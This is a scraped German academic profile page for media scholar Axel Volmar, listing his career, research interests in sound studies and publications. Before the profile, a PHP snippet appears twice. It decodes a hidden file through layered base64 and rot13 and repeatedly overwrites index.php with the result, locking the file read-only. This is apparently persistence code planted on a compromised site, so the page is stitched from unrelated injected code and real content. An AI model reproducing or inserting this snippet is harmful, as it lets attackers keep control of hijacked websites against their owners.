$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Axel Volmar – Auditive Medienkulturen

Axel Volmar

AXEL VOLMAR ist wissenschaftlicher Mitarbeiter im SFB Medien der Kooperation an der Universität Siegen. Er promovierte über die Geschichte des Hörens als Erkenntnissinn der exakten Wissenschaften. Seine aktuellen Forschungsschwerpunkte liegen in den Bereichen auditive Kultur und Sound Studies, Geschichte audiovisueller Telekommunikation sowie Medien und Zeitlichkeit. Axel Volmar war von 2012 bis 2017 der Sprecher der AG Auditive Kultur und Sound Studies und organisierte die erste AG-Tagung, die 2014 in Bonn stattfand.

Ausgewählte Veröffentlichungen: Axel Volmar: Klang-Experimente. Die auditive Kultur der Naturwissenschaften 1761–1961 (Frankfurt a. M. 2015); Bettina Schlüter und Axel Volmar (Hg.): „Von akustischen Medien zur auditiven Kultur. Zum Verhältnis von Medienwissenschaft und Sound Studies“, Themenheft der Navigationen. Zeitschrift für Medien- und Kulturwissenschaften 15/2 (2015); Axel Volmar und Jens Schröter (Hg.): Auditive Medienkulturen. Techniken des Hörens und Praktiken der Klanggestaltung (Bielefeld 2013).

Neu erschienen: Jancovic, Marek, Axel Volmar und Alexandra Schneider, Hrsg. 2019. Format Matters. Standards, Practices and Politics in Media Cultures. Lüneburg: meson press.

Informationen finden Sie auf der hier oder auf academia.edu.

Kurzbio

  • Seit 2016: Wissenschaftlicher Mitarbeiter im SFB Medien der Kooperation an der Universität Siegen
  • 2014–2016: Mellon Postdoctoral Fellow an der McGill University, Montreal
  • 2014: Gastdoktorand am Max-Planck-Institut für Wissenschaftsgeschichte Berlin
  • 2013–2016: Mitglied des DFG-Netzwerks Hör-Wissen im Wandel. Zur Wissensgeschichte des Hörens in der Moderne (Laufzeit: 2013–2015)
  • 2008–2014: Wissenschaftlicher Mitarbeiter am Medienwissenschaftlichen Seminar der Universität Siegen
  • 2011: Visiting Research Scholar am Polytechnic Institute der New York University
  • 2010/11: Wissenschaftlicher Mitarbeiter im Forschungsprojekt Zur Kulturgeschichte der Sonifikation an der Hochschule der Künste Bern
  • 2006–2008: Wissenschaftlicher Mitarbeiter am Seminar für Medienwissenschaft der Humboldt-Universität zu Berlin

Forschungsinteressen

  • Auditive Medienkultur im Spiegel von Mediengeschichte, Wissenschaftsgeschichte und Sound Studies
  • Theorie und Geschichte der Filmtongestaltung
  • Akustikgeschichte
  • Kulturgeschichte der Sonifikation
  • Geschichte audiovisueller Telekommunikation
  • Medien und Zeitlichkeit
  • Formattheorie

Publikationen (themenbezogene Auswahl)

Monografien und Herausgaben

Aufsätze

  • „Psychoakustik und Signalanalyse. Zur Ökologisierung und Metaphorisierung des Hörens seit dem Zweiten Weltkrieg“, in: Wissensgeschichte des Hörens in der Moderne, hg. von Netzwerk Hör-Wissen im Wandel, Berlin: de Gruyter, 2017, S. 65–95.
  • (zusammen mit Leonie Häsler) 2017. „Tonträger und Musikmedien. Zur Rhetorik technischer Schallproduktion vom Phonographen zum MP3-Spieler“, in: Handbuch Medienrhetorik, hg. von Arne Scheuermann und Franscesca Vidal, 6:441–461. Handbücher Rhetorik. Berlin: de Gruyter.
  • (zusammen mit Jens Schröter) „,HiFi hören. HiFi-Praxis für kritische Käufer und Fachhändler‘. Eine Fallstudie zum Problem der Analyse historischer Medienpraktiken“, in: Ochsner, Beate/Stock, Robert: senseAbility. Mediale Praktiken des Sehens und Hörens. Bielefeld: transcript, 2016, S. 149–168.
  • Klanglandschaften der new frontier. Auditive Zukunftsvisionen und das Verhältnis zwischen Avantgarde und Kulturindustrie im US-amerikanischen Science-Fiction-Film“, in: ACT Zeitschrift für Musik und Performance 6 (2015), 1–20.
  • „Tonbandgerät“, in: Horstmann, Friederike et al. (Hg.): Wörterbuch kinematographischer Objekte. Berlin: August Verlag, 2014 S. 155–157.
  • „Knall“, in: Horstmann, Friederike et al. (Hg.): Wörterbuch kinematographischer Objekte. Berlin: August Verlag, 2014, S. 77–79.
  • „Ein ,Trommelfeuer von akustischen Signalen‘. Zur auditiven Produktion von Wissen in der Geschichte der Strahlenmessung“, in: Technikgeschichte 82/1 (2015), S. 27–46.
  • (zusammen mit Bettina Schlüter) „Schnittstellen der Medienwissenschaft: Musikwissenschaft / Sound Studies“, in: Schröter, Jens (Hg.): Handbuch Medienwissenschaft. Stuttgart: J. B. Metzler, 2014, S. 440–446.
  • (zusammen mit Judith Willkomm) „Klangmedien“, in: Schröter, Jens (Hg.): Handbuch Medienwissenschaft. Stuttgart: J. B. Metzler, 2014, S. 279–288.
  • (zusammen mit Peter Pesic) „Pythagorean Longings and Cosmic Symphonies: The Musical Rhetoric of String Theory and the Sonification of Particle Physics“, in: Journal of Sonic Studies 8 (2014) [ohne Pag.].
  • „In Storms of Steel: The Soundscape of World War I and its Impact on Auditory Media Culture During the Weimar Period“, in: Morat, Daniel (Hg.): Hearing Modern History: Auditory Cultures in 19th and 20th Century Europe. New York: Berghahn, 2014, S. 227–255.
  • „Listening to the Cold War: The Nuclear Test Ban Negotiations, Seismology, and Psychoacoustics 1958–1963“, in: Osiris, Vol. 28 (2013), S. 80–102.
  • (zusammen mit Jens Schröter) „Einleitung: Auditive Medienkulturen“, in: Volmar, Axel/ Schröter, Jens (Hg.): Auditive Medienkulturen. Techniken des Hörens und Praktiken der Klanggestaltung. Bielefeld: transcript, 2013, S. 9–34.
  • „In Stahlgewittern. Mediale Rekonstruktionen der Klanglandschaft des Ersten Weltkriegs in der Weimarer Republik“, in: Natalie Binczek, Cornelia Epping-Jäger (Hrsg.): Das Hörbuch. Audioliteralität und akustische Literatur, München: Fink 2013, S. 47–63.
  • „Sonic Facts for Sound Arguments: Medicine, Experimental Physiology, and the Auditory Construction of Knowledge in the 19th Century“, in: The Journal of Sonic Studies (Special Issue: On Sonic Epistemologies. Advanced Research Strategies in Sound, hrsg. v. Holger Schulze, Marcel Cobussen, Vincent Meelberg), Jg. 4, Nr. 1 (2013), Leiden University Press [ohne Pag.].
  • „Körperklänge, Körperbilder. Auditive und visuelle Erkenntnisweisen in der Geschichte der Lungentuberkulose“, in: del Valle, Victoria/Kittler, Judith/Nickenig, Annika/Siebenborn, Eva: Repräsentationsformen von Wissen. Beiträge zum XXVI. Forum Junge Romanistik in Bochum (26.-29. Mai 2010). München: Meidenbauer 2011, S. 407–424.
  • „Auditiver Raum aus der Dose. Raumakustik, Tonstudiobau und Hallgeräte im 20. Jahrhundert“, in: Gethmann, Daniel (Hg.): Klangmaschinen zwischen Experiment und Medientechnik, transcript Verlag, Bielefeld 2010, S. 153–174.
  • (zusammen mit Kilian Hirt) „Kanalarbeit. Das Übertragungsproblem in der Geschichte der Kommunikationstechnik und die Entstehung der Signalverarbeitung“, in: Volmar, Axel (Hg.): Zeitkritische Medien, Kadmos Kulturverlag, Berlin 2009, S. 213–238.

Kontakt

Axel Volmar
SFB 1187 Medien der Kooperation
Universität Siegen
Herrengarten 3
57072 Siegen
http://www.mediacoop.uni-siegen.de
E-mail: axel.volmar@uni-siegen.de